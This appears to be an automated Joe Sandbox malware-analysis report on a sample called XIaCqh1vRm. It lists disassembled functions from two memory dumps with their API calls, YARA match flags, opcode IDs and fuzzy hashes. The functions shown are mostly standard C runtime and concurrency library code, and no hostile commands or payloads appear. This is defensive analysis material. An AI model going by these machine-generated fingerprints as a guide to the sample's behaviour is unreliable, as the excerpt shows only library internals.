                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FAC), ref: 00434F6D
                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F7B
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                          • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                                                          • Instruction ID: 16700c29e50b3fc45f4951a54cc89878b259fef574b9c48791ea2bf1872b2532
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A01FC366152226FC7214F69EC449A77798AF89F71F141631F905D7240D724E9018AEC
                                                                                                                                                                                                                                                                          Function 024C5196 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,024C513D,00000000,00000000,00000000,00000000,?,024C53F5,00000006,0044A378), ref: 024C51C8
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,024C513D,00000000,00000000,00000000,00000000,?,024C53F5,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,024C2213), ref: 024C51D4
                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,024C513D,00000000,00000000,00000000,00000000,?,024C53F5,00000006,0044A378,0044A370,0044A378,00000000), ref: 024C51E2
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                          • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                                                          • Instruction ID: c05e4e793d37aab7a09084e07b295d753bb2f2775b30038cc04b733b28b8915c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F601FC3EA022226BC7614F6D9C48E5F7B98AF46F617700639F905F7340CB20E541CAE4
                                                                                                                                                                                                                                                                          Function 0042612E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426148
                                                                                                                                                                                                                                                                          • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042615C
                                                                                                                                                                                                                                                                          • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426174
                                                                                                                                                                                                                                                                          • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042618C
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 78362717-0
                                                                                                                                                                                                                                                                          • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                                                                          • Instruction ID: ecb18499877976be64129c87880db9b40f2952d25c9d93d1b0c0aa07095992c1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2901F232700120B7DB12EE5A9801AFF77A99B94354F41005BFC11A7382DA24FD2192A8
                                                                                                                                                                                                                                                                          Function 024B6395 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 024B63AF
                                                                                                                                                                                                                                                                          • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 024B63C3
                                                                                                                                                                                                                                                                          • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 024B63DB
                                                                                                                                                                                                                                                                          • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 024B63F3
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 78362717-0
                                                                                                                                                                                                                                                                          • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                                                                          • Instruction ID: 27135b7cb652ef6265316e3c59b4e04065e28b3d5c569a891c49cc10221611e2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B01D636600114B7DF17EE65C850AEF779EDF55350F01045BEC21AB381DAB1ED118AB0
                                                                                                                                                                                                                                                                          Function 024B2B82 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Concurrency::location::_Assign.LIBCMT ref: 024B2BB1
                                                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 024B2BCF
                                                                                                                                                                                                                                                                            • Part of subcall function 024A8687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 024A86A8
                                                                                                                                                                                                                                                                            • Part of subcall function 024A8687: Hash.LIBCMT ref: 024A86E8
                                                                                                                                                                                                                                                                          • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 024B2BD8
                                                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 024B2BF8
                                                                                                                                                                                                                                                                            • Part of subcall function 024AF6DF: Hash.LIBCMT ref: 024AF6F1
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2250070497-0
                                                                                                                                                                                                                                                                          • Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                                                                                                                                                                                                          • Instruction ID: 98bbc2ef6c4a819673a9bd935fc39826533340a999af2b5411199a66d344df78
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C117C76800604ABC715DF65C890ACAF7B9BF59320B014A1FE95A8B551DBB0E904CBA0
                                                                                                                                                                                                                                                                          Function 024B2B91 Relevance: 6.0, APIs: 4, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Concurrency::location::_Assign.LIBCMT ref: 024B2BB1
                                                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 024B2BCF
                                                                                                                                                                                                                                                                            • Part of subcall function 024A8687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 024A86A8
                                                                                                                                                                                                                                                                            • Part of subcall function 024A8687: Hash.LIBCMT ref: 024A86E8
                                                                                                                                                                                                                                                                          • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 024B2BD8
                                                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 024B2BF8
                                                                                                                                                                                                                                                                            • Part of subcall function 024AF6DF: Hash.LIBCMT ref: 024AF6F1
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2250070497-0
                                                                                                                                                                                                                                                                          • Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                                                                                                                                                                                                          • Instruction ID: 04b7ef5611412a3e6f83fff8b8e3c99265c916775d7181590b29daf7a5025c4d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD011776400604ABC715DF6AC891EDAB7F9FF58320B008A1EE55A87650DBB0F944CB60
                                                                                                                                                                                                                                                                          Function 0040591F Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00405926
                                                                                                                                                                                                                                                                            • Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E
                                                                                                                                                                                                                                                                          • std::_Locinfo::_Locinfo.LIBCPMT ref: 00405971
                                                                                                                                                                                                                                                                          • __Getcoll.LIBCPMT ref: 00405980
                                                                                                                                                                                                                                                                          • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405990
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1836011271-0
                                                                                                                                                                                                                                                                          • Opcode ID: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
                                                                                                                                                                                                                                                                          • Instruction ID: 86b703767978d3f357e5c0a9ff64a1160fbba7df876fc0f231fbc64f2b881c41
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C013271900208DFDB00EFA5C481B9EB7B0AF40328F10857EE055AB682DB789988CF98
                                                                                                                                                                                                                                                                          Function 024950CA Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 024950D1
                                                                                                                                                                                                                                                                            • Part of subcall function 0249BDAE: __EH_prolog3_GS.LIBCMT ref: 0249BDB5
                                                                                                                                                                                                                                                                          • std::_Locinfo::_Locinfo.LIBCPMT ref: 0249511C
                                                                                                                                                                                                                                                                          • __Getcoll.LIBCPMT ref: 0249512B
                                                                                                                                                                                                                                                                          • std::_Locinfo::~_Locinfo.LIBCPMT ref: 0249513B
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1836011271-0
                                                                                                                                                                                                                                                                          • Opcode ID: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
                                                                                                                                                                                                                                                                          • Instruction ID: 5eb145ec457a884126c599b5249d2f305a822d70e51bdbe2bcda5e293ade1c3d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87018871D10208AFEF01EFA9D481B9DBBB1BF54315F50812FD055AB280CB749544CF95
                                                                                                                                                                                                                                                                          Function 02495B86 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 02495B8D
                                                                                                                                                                                                                                                                            • Part of subcall function 0249BDAE: __EH_prolog3_GS.LIBCMT ref: 0249BDB5
                                                                                                                                                                                                                                                                          • std::_Locinfo::_Locinfo.LIBCPMT ref: 02495BD8
                                                                                                                                                                                                                                                                          • __Getcoll.LIBCPMT ref: 02495BE7
                                                                                                                                                                                                                                                                          • std::_Locinfo::~_Locinfo.LIBCPMT ref: 02495BF7
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1836011271-0
                                                                                                                                                                                                                                                                          • Opcode ID: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
                                                                                                                                                                                                                                                                          • Instruction ID: 76308099f333d1b1bb664119fadcda707349a68d7ef611e96cc11610f4682a43
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD019A71900208EFEF00EFA9D480BAEBBB1BF54315F20802FD055AB280CBB89944CF94
                                                                                                                                                                                                                                                                          Function 0041BED7 Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
                                                                                                                                                                                                                                                                          • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
                                                                                                                                                                                                                                                                          • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
                                                                                                                                                                                                                                                                          • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF3D
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Compare_exchange_acquire_4std::_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3973403980-0
                                                                                                                                                                                                                                                                          • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                                                          • Instruction ID: a39f72e40e0a7d69bee2e58a2fbea005eb0d9eb8afdd5f219c4e4bdc303a66e9
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3201FB3745414DBBCF119E64DD429EE3B66EB05354B188417F918C4231C336CAB2AF8D
                                                                                                                                                                                                                                                                          Function 024AC13E Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024AC170
                                                                                                                                                                                                                                                                          • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024AC180
                                                                                                                                                                                                                                                                          • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024AC190
                                                                                                                                                                                                                                                                          • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024AC1A4
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Compare_exchange_acquire_4std::_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3973403980-0
                                                                                                                                                                                                                                                                          • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                                                          • Instruction ID: d86c9070bf739f4af1e02929b4a024fd0d09b821d27c0afaf1be00be7cb3fbb9
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF01B67A504149BBDF929F94DC918AE3BA6AF35350F048517F91888170D732C6B1EF85
                                                                                                                                                                                                                                                                          Function 0040D21F Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110DB
                                                                                                                                                                                                                                                                            • Part of subcall function 0041094D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041096F
                                                                                                                                                                                                                                                                            • Part of subcall function 0041094D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410990
                                                                                                                                                                                                                                                                          • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110EE
                                                                                                                                                                                                                                                                          • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110FA
                                                                                                                                                                                                                                                                          • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411103
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4284812201-0
                                                                                                                                                                                                                                                                          • Opcode ID: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
                                                                                                                                                                                                                                                                          • Instruction ID: 3d6a6adf541079fe7b6c6bfd004b769b4972a14d6898e3ab699feac8cff21146
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61F02B31B00204A7DF24BBA644526FE36564F44318F04413FBA12EB3D1DEBC9DC1925D
                                                                                                                                                                                                                                                                          Function 0041350C Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413525
                                                                                                                                                                                                                                                                            • Part of subcall function 004128AF: ___crtGetTimeFormatEx.LIBCMT ref: 004128C5
                                                                                                                                                                                                                                                                            • Part of subcall function 004128AF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128E4
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00413541
                                                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413557
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00413565
                                                                                                                                                                                                                                                                            • Part of subcall function 00412685: SetThreadPriority.KERNEL32(?,?), ref: 00412691
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1674182817-0
                                                                                                                                                                                                                                                                          • Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                                                                                                                                                                                          • Instruction ID: 4f5043be301f020a87894878a43913a51c3f7b1e9493329acf7807e64a758140
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69F0E2B1A002253AE724B6765D07FFB369C9B00B54F50091BB905E60C2EDDCE58042AC
                                                                                                                                                                                                                                                                          Function 024A3773 Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 024A378C
                                                                                                                                                                                                                                                                            • Part of subcall function 024A2B16: ___crtGetTimeFormatEx.LIBCMT ref: 024A2B2C
                                                                                                                                                                                                                                                                            • Part of subcall function 024A2B16: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 024A2B4B
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 024A37A8
                                                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A37BE
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 024A37CC
                                                                                                                                                                                                                                                                            • Part of subcall function 024A28EC: SetThreadPriority.KERNEL32(?,?), ref: 024A28F8
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1674182817-0
                                                                                                                                                                                                                                                                          • Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                                                                                                                                                                                          • Instruction ID: 81d91a01cb2e836bed8c616c328e87e10c7f04290d2964ef754f1e950751ffd1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4F027B6A002153AD720FB724C06FBB3A9C9F20740F50086FB905E2180FAD8D4009AB4
                                                                                                                                                                                                                                                                          Function 0249D486 Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 024A1342
                                                                                                                                                                                                                                                                            • Part of subcall function 024A0BB4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 024A0BD6
                                                                                                                                                                                                                                                                            • Part of subcall function 024A0BB4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 024A0BF7
                                                                                                                                                                                                                                                                          • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 024A1355
                                                                                                                                                                                                                                                                          • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 024A1361
